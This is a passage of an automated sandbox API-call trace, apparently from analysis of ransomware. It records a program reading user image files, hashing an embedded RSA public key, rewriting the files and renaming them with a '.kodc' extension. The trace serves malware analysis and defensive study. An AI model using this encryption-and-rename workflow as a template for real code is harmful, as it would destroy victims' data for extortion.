Flags=0x0, Size=0x204) returned 0x9b96968 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a58 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a88 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a70 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9bf50 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.793] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x96f4, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x96f4, lpOverlapped=0x0) returned 1 [0099.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.794] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x96f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.794] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.794] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.794] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.794] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.794] CloseHandle (hObject=0x5cc) returned 1 [0099.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.806] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uP81S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\up81s.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uP81S.jpg.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\up81s.jpg.kodc")) returned 1 [0099.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.809] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.810] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b79c9f0, ftCreationTime.dwHighDateTime=0x1d5c142, ftLastAccessTime.dwLowDateTime=0xa6a30040, ftLastAccessTime.dwHighDateTime=0x1d5bec6, ftLastWriteTime.dwLowDateTime=0xa6a30040, ftLastWriteTime.dwHighDateTime=0x1d5bec6, nFileSizeHigh=0x0, nFileSizeLow=0xf3eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zj3vAJ-ez.bmp", cAlternateFileName="ZJ3VAJ~1.BMP")) returned 1 [0099.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.810] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zj3vAJ-ez.bmp") returned=".bmp" [0099.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zj3vAJ-ez.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zj3vaj-ez.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.810] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=62443) returned 1 [0099.811] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.813] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf3c5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.813] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.814] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.814] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xf3eb, lpOverlapped=0x0) returned 1 [0099.815] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.815] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.815] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.815] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.816] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.816] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.816] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.816] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.816] GetLastError () returned 0x0 [0099.816] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.816] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.816] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.816] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.817] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf3f0) returned 0x9ba6d90 [0099.817] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bf50 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bf98 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79e0 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a70 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a88 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.818] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a70 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a88 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a88 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7a70 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a88 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a70 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.819] GetCurrentThreadId () returned 0x42c [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5df8 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.819] GetCurrentThreadId () returned 0x42c [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a70 [0099.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a88 [0099.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a58 [0099.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.820] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.820] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.821] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf3eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.821] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 